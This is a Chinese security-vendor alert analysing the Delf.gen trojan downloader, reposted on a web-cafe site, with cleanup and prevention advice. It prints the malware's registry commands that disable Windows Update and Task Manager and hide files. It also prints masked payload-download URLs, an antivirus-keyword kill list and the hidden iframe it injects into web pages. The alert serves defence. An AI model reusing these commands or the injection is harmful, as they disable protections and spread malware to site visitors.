设为首页
加入收藏
联系我们
   
   
文章搜索
精品推荐
分类导航
操作系统 佳软推介
冲浪宝典 办公专区
网页制作 网络安全
应用安全 黑客攻防
QQ空间
热门文章
· 怎样降低网吧运行成本
· 可免费升级一年的卡巴
· 只读更新全程图解教程
· 迅闪v4.5破解版[附教程
· 非主流18禁淫荡图片_非
· 网吧母盘的制作
· [西安]孙清云专门批示
· 详的XP母盘制作
· 网吧推出女性专区(图)
· 非主流梦幻少女的鞋鞋
· 玩酷FZL_彩绘酷型帽子
· 经典-唯美花儿银饰
· 新年绝美款日系Party鞋
· 韩式Feizl_可爱发饰
· 可爱公主_FZL糖果胸针
· 珍珠个性Fzl美饰
· 个性非主流挂坠
· 少女可爱零钱包挂件
相关文章
 网吧中七种最不安全的网络 
 赛门铁克:65%的软 
 EMC斥资2.13亿美元收 
 安全 iPhone 2.0企业应用的 
 小企业数据库安全 
 安全专家讲解Mysql故 
 确保安全 数据库审计成燃眉 
 Oracle数据库网络与安全FA 
 浅谈如何实现互联网上数据 
 捍卫安全 Outpost 2 
 加固防线 为系统穿上 
 最安全Windows Server 200 
 从“艳照门”事件谈网吧隐 
 2007年Q4中国网络安 
 即时通信安全不容忽 
 深入底层 评估Vista 
 安全机构发布XP和Vista的恶 
 系统安全从定制IP策略开始 
 简述Windows Server 2008三 
 六大原因解析Linux比Windo 
 六大原因 为何Linux 
 OneCare 未来不可忽视的安 
 内网计算机安全技术十大策 
 绝对不可错过 WinRAR的三种 
 巧妙设置 将文件隐藏起来确 
 微软发布高危安全补丁修补 
 另类系统安全:巧用身份拒 
 安全公告:Windows 
 安全技巧:用TCP/IP 
 安全实例:遭遇“艳 
 US-CERT:ActiveX 安全性依 
 从ForeFront特性看Windows 
 DBA必读:SQL Serve 
 甲骨文更新27个安全补丁敲 
 双引擎查杀 360安全 
 详细了解Windows Vi 
 在Vista侧边栏上显示 
 深入底层 评估Vista系统内 
 Windows Vista服务安全强化 
 如何增强solaris安全 




您当前的位置:西安网吧在线 -> 电脑技巧 -> 佳软推介 -> 文章内容

安全警报:Trojan-Downloader.Win32.Delf.gen

作者:超级巡警  来源:太平洋电脑网  发布时间:2007-12-11 6:22:59  发布人:Cn029.Com

减小字体 增大字体

  超级巡警团队监测到恶意程序Trojan-Downloader.Win32.Delf.gen变种发布速度很快,并且针对大多数反病毒软件进行了相应的处理,以逃避被查杀。该程序不仅会在网页文件中插入恶意框架代码,通过多种系统或应用程序漏洞传播木马,还会释放利用系统自动运行功能的autorun.inf文件及相应文件。

  一、病毒相关分析:

  病毒标签:

  病毒名称:Trojan-Downloader.Win32.Delf.gen

  病毒类型:木马下载者

  危害级别:3

  感染平台:Windows

  病毒大小:34,424(字节)

  SHA1  :0801dacd6a579ec5f0ed5d97e7f336b59ea2fbb9

  加壳类型:未知

  开发工具:Delphi

  病毒行为:

  1、程序运行后,释放文件:

  %System%\Systom.exe

  %System%\auToRun.inf

  并在磁盘各个分区释放文件sos.exe和auToRun.inf

  2、执行以下命令,修改注册表:

  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate" /v

  DisableWindowsUpdateAccess /t REG_dword /d 00000001 /f //禁用系统自动升级

  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v

  DisableTaskMgr /t REG_dword /d 00000001 /f       //禁用任务管理器

  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\EXPlorer\Advanced" /v Hidden /t

  reg_dWord /d 00000000 /f                                //隐藏文件

  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt

  /t reg_dword /d 00000001 /f                             //隐藏扩展名

  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden

  /t reg_dword /d 00000000 /f                             //隐藏文件

  reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL"

  /v CheckedValue /t REG_SZ /d 0 /f                       //隐藏文件

  reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN"

  /v CheckedValue /t REG_dword /d 00000002 /f             //隐藏文件

  3、下载文件:

  http://*****/1.txt

  http://*****/2.txt

  http://*****/3.txt

  其中1.txt内容为:

  http://*****/mh.exe

  http://*****/ok.exe

  http://*****/Server.exe

  http://*****/uc.exe

  http://*****/t/servere.exe

  下载以上文件并重命名为?svchs0t.exe复制到系统目录%System%下    //?为从0开始数字

  其中2.txt内容为:

  360安全卫士

  卡巴

  瑞星

  麦咖啡

  NOD32

  木马

  防火墙

  专杀工具

  4、监控并关闭含有“病毒、木马、检测、wpe”等字符的窗体

  5、在磁盘中所有网页文件尾部插入框架代码链接网马地址:

  <IfrAmE src=http://*****/index.htm width=50 height=0></IfrAmE>

  index.htm文件内容与网马利用漏洞如下图:

  二、解决方案

  推荐方案:

  1、安装超级巡警进行全面病毒查杀。超级巡警用户请升级到最新病毒库,并进行全盘扫描。

  2、升级系统及应用程序到最新版本。

  3、选择超级巡警“工具”中“智能扫描”功能中的“清除指定代码”,进行全盘扫描并清除插入网页文件中的框架

  代码。

  超级巡警下载地址:http://www.dswlab.com/d1.html

  三、安全建议

  1、立即安装或更新防病毒软件并对内存和硬盘全面扫描(推荐安装超级巡警)。

  2、根据实际安全级别需要适当考虑选用防火墙,并进行正确的设置。

  3、使用超级巡警的补丁检查功能,及时安装系统补丁

  4、禁用或删除不必要的的帐号,对管理员帐号设置一个强壮的密码。

  5、禁用不必要的服务。

  6、及时更新常用软件,尤其是聊天工具。

  7、不要随意下载不安全网站的文件并运行。

  8、下载和新拷贝的文件要首先进行查毒。

  9、不要轻易打开即时通讯工具中发来的链接或可执行文件。

  10、使用移动存储介质进行数据访问时,先对其进行病毒检查,建议使用超级巡警U盘免疫器进行免疫。

  注: %System% 是一个可变路径,在windows95/98/me中该变量是指%Windir%\System,在WindowsNT/2000/XP/2003/VISTA中该变

  量指%Windir%\System32。其它:

  %SystemDrive%           系统安装的磁盘分区

  %SystemRoot% = %Windir%   WINDODWS系统目录

  %ProgramFiles%        应用程序默认安装目录

  %AppData%               应用程序数据目录

  %CommonProgramFiles%      公用文件目录

  %HomePath%              当前活动用户目录

  %Temp% =%Tmp%           当前活动用户临时目录

  %DriveLetter%           逻辑驱动器分区

  %HomeDrive%            当前用户系统所在分区



声 明: 西安网吧在线(Cn029.Com) 所发表的文章与图片仅代表作者本人观点,与本站立场无关,
也不构成任何建议。对本文有任何异议,请联络: webmaster@cn029.com
若文章内容侵犯了您的相关权益,请及时与我们联系,我们会及时处理,感谢您对本站的支持!

[] [返回上一页] [打 印] [收 藏]
    ∷相关文章评论∷ (评论内容只代表网友观点,与本站立场无关!)查看完整评论内容
    文章评论     请注意用语文明且合法,不要发布带有攻击性的言论,谢谢合作!!
用户名
分  值
100分 80分 50分 10分 0分
评  论
  (注“”为必填内容。)